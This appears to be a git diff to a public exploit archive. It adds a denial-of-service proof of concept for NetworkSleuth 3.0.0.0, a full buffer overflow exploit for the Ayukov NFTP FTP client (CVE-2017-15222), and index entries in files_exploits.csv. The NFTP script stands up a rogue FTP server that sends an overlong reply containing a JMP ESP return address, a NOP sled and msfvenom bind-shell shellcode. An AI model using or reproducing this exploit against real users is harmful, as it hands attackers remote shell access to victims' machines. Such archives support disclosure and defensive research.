+# Vulnerability Type: Denial of Service (DoS) Local
+# Tested on OS: Windows 10 Pro x64 es
+
+# Steps to Produce the Crash: 
+# 1.- Run python code : python NetworkSleuth_3.0.0.0.py
+# 2.- Open NetworkSleuth_3.0.0.0.txt and copy content to clipboard
+# 3.- Open NetworkSleuth
+# 4.- Register -> Enter Registration Code...
+# 5.- Name: -> l4m5
+# 6.- Paste ClipBoard on "Key:"
+# 7.- OK
+# 8.- Crashed
+
+#!/usr/bin/env python
+ 
+buffer = "\x41" * 276
+f = open ("NetworkSleuth_3.0.0.0.txt", "w")
+f.write(buffer)
+f.close()

exploits/windows_x86/local/46070.py

@@ -0,0 +1,71 @@
+# Exploit Title: Ayukov NFTP FTP Client 2.0 - Buffer Overflow
+# Date: 2018-12-29
+# Exploit Author: Uday Mittal
+# Vendor Homepage: http://www.ayukov.com/nftp/
+# Software Link: ftp://ftp.ayukov.com/pub/src/nftp-1.72.zip 
+# Version : below 2.0
+# Tested on: Microsoft Windows XP SP3
+# CVE: CVE-2017-15222
+
+# EIP Location: 4116
+# Buffer starts from : 4121
+# 0x7e45b310 : jmp esp |  {PAGE_EXECUTE_READ} [USER32.dll] ASLR: False, Rebase: False, SafeSEH: True, OS: True, v5.1.2600.5512 (C:\WINDOWS\system32\USER32.dll)
+# badchars: '\x00\x0A\x0D\x40'
+# Shellcode: msfvenom -p windows/shell_bind_tcp RHOST=192.168.43.72 LPORT=4444 -b '\x00\x0A\x0D' -f python
+
+import socket
+
+IP = '192.168.43.28'
+port = 21
+
+buf =  ""
+buf += "\xbb\x04\x8b\xfc\xf1\xd9\xc4\xd9\x74\x24\xf4\x5a\x29"
+buf += "\xc9\xb1\x53\x83\xea\xfc\x31\x5a\x0e\x03\x5e\x85\x1e"
+buf += "\x04\xa2\x71\x5c\xe7\x5a\x82\x01\x61\xbf\xb3\x01\x15"
+buf += "\xb4\xe4\xb1\x5d\x98\x08\x39\x33\x08\x9a\x4f\x9c\x3f"
+buf += "\x2b\xe5\xfa\x0e\xac\x56\x3e\x11\x2e\xa5\x13\xf1\x0f"
+buf += "\x66\x66\xf0\x48\x9b\x8b\xa0\x01\xd7\x3e\x54\x25\xad"
+buf += "\x82\xdf\x75\x23\x83\x3c\xcd\x42\xa2\x93\x45\x1d\x64"
+buf += "\x12\x89\x15\x2d\x0c\xce\x10\xe7\xa7\x24\xee\xf6\x61"
+buf += "\x75\x0f\x54\x4c\xb9\xe2\xa4\x89\x7e\x1d\xd3\xe3\x7c"
+buf += "\xa0\xe4\x30\xfe\x7e\x60\xa2\x58\xf4\xd2\x0e\x58\xd9"
+buf += "\x85\xc5\x56\x96\xc2\x81\x7a\x29\x06\xba\x87\xa2\xa9"
+buf += "\x6c\x0e\xf0\x8d\xa8\x4a\xa2\xac\xe9\x36\x05\xd0\xe9"
+buf += "\x98\xfa\x74\x62\x34\xee\x04\x29\x51\xc3\x24\xd1\xa1"
+buf += "\x4b\x3e\xa2\x93\xd4\x94\x2c\x98\x9d\x32\xab\xdf\xb7"
+buf += "\x83\x23\x1e\x38\xf4\x6a\xe5\x6c\xa4\x04\xcc\x0c\x2f"
+buf += "\xd4\xf1\xd8\xda\xdc\x54\xb3\xf8\x21\x26\x63\xbd\x89"
+buf += "\xcf\x69\x32\xf6\xf0\x91\x98\x9f\x99\x6f\x23\x8e\x05"
+buf += "\xf9\xc5\xda\xa5\xaf\x5e\x72\x04\x94\x56\xe5\x77\xfe"
+buf += "\xce\x81\x30\xe8\xc9\xae\xc0\x3e\x7e\x38\x4b\x2d\xba"
+buf += "\x59\x4c\x78\xea\x0e\xdb\xf6\x7b\x7d\x7d\x06\x56\x15"
+buf += "\x1e\x95\x3d\xe5\x69\x86\xe9\xb2\x3e\x78\xe0\x56\xd3"
+buf += "\x23\x5a\x44\x2e\xb5\xa5\xcc\xf5\x06\x2b\xcd\x78\x32"
+buf += "\x0f\xdd\x44\xbb\x0b\x89\x18\xea\xc5\x67\xdf\x44\xa4"
+buf += "\xd1\x89\x3b\x6e\xb5\x4c\x70\xb1\xc3\x50\x5d\x47\x2b"
+buf += "\xe0\x08\x1e\x54\xcd\xdc\x96\x2d\x33\x7d\x58\xe4\xf7"
+buf += "\x8d\x13\xa4\x5e\x06\xfa\x3d\xe3\x4b\xfd\xe8\x20\x72"
+buf += "\x7e\x18\xd9\x81\x9e\x69\xdc\xce\x18\x82\xac\x5f\xcd"
+buf += "\xa4\x03\x5f\xc4"
+
+evil = "A"*4116 + "\x10\xb3\x45\x7e" + "\x90"*100 +  buf + "D"*10425
+
+try:
+        s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
+        s.bind((IP, port))
+        s.listen(20)
+        print("[i] FTP Server started on port: "+str(port)+"\r\n")
+except:
+        print("[!] Failed to bind the server to port: "+str(port)+"\r\n")
+
+while True:
+    conn, addr = s.accept()
+    conn.send('220 Welcome!' + '\r\n')
+    print conn.recv(1024)
+    conn.send('331 OK.\r\n')
+    print conn.recv(1024)
+    conn.send('230 OK.\r\n')
+    print conn.recv(1024)
+    conn.send(evil + '\r\n')
+    print conn.recv(1024)
+    conn.send('257' + '\r\n')

files_exploits.csv

@@ -5979,6 +5979,8 @@ id,file,description,date,author,type,platform,port
 44693,exploits/linux/dos/44693.py,"Siemens SIMATIC S7-1500 CPU - Remote Denial of Service",2018-05-22,t4rkd3vilz,dos,linux,
 44694,exploits/windows/dos/44694.js,"Microsoft Edge Chakra JIT - Magic Value Type Confusion",2018-05-22,"Google Security Research",dos,windows,
 44695,exploits/hardware/dos/44695.c,"AMD / ARM / Intel - Speculative Execution Variant 4 Speculative Store Bypass",2018-05-22,"Google Security Research",dos,hardware,
+46068,exploits/windows_x86-64/dos/46068.py,"EZ CD Audio Converter 8.0.7 - Denial of Service (PoC)",2019-01-02,Achilles,dos,windows_x86-64,
+46069,exploits/windows_x86-64/dos/46069.py,"NetworkSleuth 3.0.0.0 - 'Key' Denial of Service (PoC)",2019-01-02,"Luis Martínez",dos,windows_x86-64,
 44717,exploits/windows_x86/dos/44717.txt,"FTPShell Server 6.80 - Denial of Service",2018-05-23,"Hashim Jawad",dos,windows_x86,
 44721,exploits/linux/dos/44721.py,"Siemens SCALANCE S613 - Remote Denial of Service",2018-05-23,t4rkd3vilz,dos,linux,
 44724,exploits/android/dos/44724.txt,"Samsung Galaxy S7 Edge - Overflow in OMACP WbXml String Extension Processing",2018-05-23,"Google Security Research",dos,android,
@@ -6229,6 +6231,9 @@ id,file,description,date,author,type,platform,port
 46057,exploits/windows_x86/dos/46057.py,"Product Key Explorer 4.0.9 - Denial of Service (PoC)",2018-12-27,T3jv1l,dos,windows_x86,
 46062,exploits/windows_x86/dos/46062.py,"NetShareWatcher 1.5.8 - Denial of Service (PoC)",2018-12-27,T3jv1l,dos,windows_x86,
 46063,exploits/windows_x86/dos/46063.py,"ShareAlarmPro 2.1.4 - Denial of Service (PoC)",2018-12-27,T3jv1l,dos,windows_x86,
+46064,exploits/windows_x86-64/dos/46064.py,"NBMonitor Network Bandwidth Monitor 1.6.5.0 - 'Name' Denial of Service (PoC)",2019-01-02,"Luis Martínez",dos,windows_x86-64,
+46071,exploits/multiple/dos/46071.html,"WebKit JSC - 'AbstractValue::set' Use-After-Free",2019-01-02,"Google Security Research",dos,multiple,
+46072,exploits/multiple/dos/46072.js,"WebKit JSC - 'JSArray::shiftCountWithArrayStorage' Out-of-Bounds Read/Write",2019-01-02,"Google Security Research",dos,multiple,
 3,exploits/linux/local/3.c,"Linux Kernel 2.2.x/2.4.x (RedHat) - 'ptrace/kmod' Local Privilege Escalation",2003-03-30,"Wojciech Purczynski",local,linux,
 4,exploits/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Local Buffer Overflow",2003-04-01,Andi,local,solaris,
 12,exploits/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",2003-04-14,KuRaK,local,linux,
@@ -9985,6 +9990,7 @@ id,file,description,date,author,type,platform,port
 44690,exploits/android/local/44690.txt,"MakeMyTrip 7.2.4 - Information Disclosure",2018-05-22,"Divya Jain",local,android,
 44696,exploits/linux/local/44696.rb,"Linux 4.4.0 < 4.4.0-53 - 'AF_PACKET chocobo_root' Local Privilege Escalation (Metasploit)",2018-05-22,Metasploit,local,linux,
 44697,exploits/windows/local/44697.txt,"Microsoft Windows - 'POP/MOV SS' Privilege Escalation",2018-05-22,"Can Bölük",local,windows,
+46070,exploits/windows_x86/local/46070.py,"Ayukov NFTP FTP Client 2.0 - Buffer Overflow",2019-01-02,"Uday Mittal",local,windows_x86,
 44713,exploits/windows/local/44713.py,"FTPShell Server 6.80 - Buffer Overflow (SEH)",2018-05-23,"Hashim Jawad",local,windows,
 44741,exploits/windows/local/44741.html,"Microsoft Internet Explorer 11 (Windows 7 x64/x86) - vbscript Code Execution",2018-05-21,smgorelik,local,windows,
 44742,exploits/windows/local/44742.txt,"Flash ActiveX 18.0.0.194 - Code Execution",2018-02-13,smgorelik,local,windows,
@@ -17043,6 +17049,8 @@ id,file,description,date,author,type,platform,port
 46048,exploits/multiple/remote/46048.py,"Netatalk - Bypass Authentication",2018-12-21,"Tenable NS",remote,multiple,
 46052,exploits/multiple/remote/46052.py,"Kubernetes - (Unauthenticated) Arbitrary Requests",2018-12-10,evict,remote,multiple,
 46053,exploits/multiple/remote/46053.py,"Kubernetes - (Authenticated) Arbitrary Requests",2018-12-10,evict,remote,multiple,
+46073,exploits/linux/remote/46073.rb,"Hashicorp Consul - Remote Command Execution via Rexec (Metasploit)",2019-01-02,Metasploit,remote,linux,
+46074,exploits/linux/remote/46074.rb,"Hashicorp Consul - Remote Command Execution via Services API (Metasploit)",2019-01-02,Metasploit,remote,linux,
 6,exploits/php/webapps/6.php,"WordPress 2.0.2 - 'cache' Remote Shell Injection",2006-05-25,rgod,webapps,php,
 44,exploits/php/webapps/44.pl,"phpBB 2.0.5 - SQL Injection Password Disclosure",2003-06-20,"Rick Patel",webapps,php,
 47,exploits/php/webapps/47.c,"phpBB 2.0.4 - PHP Remote File Inclusion",2003-06-30,Spoofed,webapps,php,
@@ -39902,6 +39910,8 @@ id,file,description,date,author,type,platform,port
 44701,exploits/php/webapps/44701.txt,"Feedy RSS News Ticker 2.0 - 'cat' SQL Injection",2018-05-22,AkkuS,webapps,php,
 44702,exploits/php/webapps/44702.txt,"NewsBee CMS 1.4 - 'download.php' SQL Injection",2018-05-22,AkkuS,webapps,php,
 44703,exploits/php/webapps/44703.txt,"Easy File Uploader 1.7 - SQL Injection / Cross-Site Scripting",2018-05-22,AkkuS,webapps,php,
+46066,exploits/php/webapps/46066.txt,"WordPress Plugin Adicon Server 1.2 - 'selectedPlace' SQL Injection",2019-01-02,Kaimi,webapps,php,80
+46067,exploits/php/webapps/46067.txt,"Frog CMS 0.9.5 - Cross-Site Scripting",2019-01-02,WangDudu,webapps,php,80
 44706,exploits/php/webapps/44706.txt,"EasyService Billing 1.0 - SQL Injection / Cross-Site Scripting",2018-05-23,AkkuS,webapps,php,
 44707,exploits/php/webapps/44707.txt,"EasyService Billing 1.0 - 'p1' SQL Injection",2018-05-23,AkkuS,webapps,php,
 44708,exploits/php/webapps/44708.txt,"MySQL Smart Reports 1.0 - 'id' SQL Injection / Cross-Site Scripting",2018-05-23,AkkuS,webapps,php,
@@ -40537,13 +40547,14 @@ id,file,description,date,author,type,platform,port
 46014,exploits/php/webapps/46014.txt,"Bolt CMS < 3.6.2 - Cross-Site Scripting",2018-12-19,"Raif Berkay Dincel",webapps,php,80
 46015,exploits/php/webapps/46015.txt,"Yeswiki Cercopitheque - 'id' SQL Injection",2018-12-19,"Mickael BROUTY",webapps,php,80
 46017,exploits/multiple/webapps/46017.txt,"IBM Operational Decision Manager 8.x - XML External Entity Injection",2018-12-19,"Mohamed M.Fouad",webapps,multiple,9443
-46027,exploits/php/webapps/46027.html,"ZeusCart 4.0 - Cross-Site Request Forgery (Deactivate Customer Accounts)",2018-12-21,mqt,webapps,php,
-46035,exploits/php/webapps/46035.txt,"WSTMart 2.0.8 - Cross-Site Scripting",2018-12-24,linfeng,webapps,php,
+46027,exploits/php/webapps/46027.html,"ZeusCart 4.0 - Cross-Site Request Forgery (Deactivate Customer Accounts)",2018-12-21,mqt,webapps,php,80
+46035,exploits/php/webapps/46035.txt,"WSTMart 2.0.8 - Cross-Site Scripting",2018-12-24,linfeng,webapps,php,80
 46036,exploits/php/webapps/46036.txt,"WSTMart 2.0.8 - Cross-Site Request Forgery (Add Admin)",2018-12-24,linfeng,webapps,php,
-46037,exploits/php/webapps/46037.txt,"FrontAccounting 2.4.5 - 'SubmitUser' SQL Injection",2018-12-24,"Sainadh Jamalpur",webapps,php,
+46037,exploits/php/webapps/46037.txt,"FrontAccounting 2.4.5 - 'SubmitUser' SQL Injection",2018-12-24,"Sainadh Jamalpur",webapps,php,80
 46041,exploits/php/webapps/46041.py,"phpMyAdmin 4.8.4 - 'AllowArbitraryServer' Arbitrary File Read",2018-12-15,VulnSpy,webapps,php,
 46050,exploits/php/webapps/46050.txt,"PhpSpreadsheet < 1.5.0 - XML External Entity (XXE)",2018-11-30,"Alex Leahu",webapps,php,
-46054,exploits/php/webapps/46054.txt,"Craft CMS 3.0.25 - Cross-Site Scripting",2018-12-27,"Raif Berkay Dincel",webapps,php,
+46054,exploits/php/webapps/46054.txt,"Craft CMS 3.0.25 - Cross-Site Scripting",2018-12-27,"Raif Berkay Dincel",webapps,php,80
 46055,exploits/php/webapps/46055.txt,"WordPress Plugin Audio Record 1.0 - Arbitrary File Upload",2018-12-27,Kaimi,webapps,php,
-46060,exploits/php/webapps/46060.txt,"bludit Pages Editor 3.0.0 - Arbitrary File Upload",2018-12-27,BouSalman,webapps,php,
-46061,exploits/php/webapps/46061.txt,"WordPress Plugin Baggage Freight Shipping Australia 0.1.0 - Arbitrary File Upload",2018-12-27,Kaimi,webapps,php,
+46060,exploits/php/webapps/46060.txt,"bludit Pages Editor 3.0.0 - Arbitrary File Upload",2018-12-27,BouSalman,webapps,php,80
+46061,exploits/php/webapps/46061.txt,"WordPress Plugin Baggage Freight Shipping Australia 0.1.0 - Arbitrary File Upload",2018-12-27,Kaimi,webapps,php,80
+46065,exploits/php/webapps/46065.py,"Vtiger CRM 7.1.0 - Remote Code Execution",2019-01-02,AkkuS,webapps,php,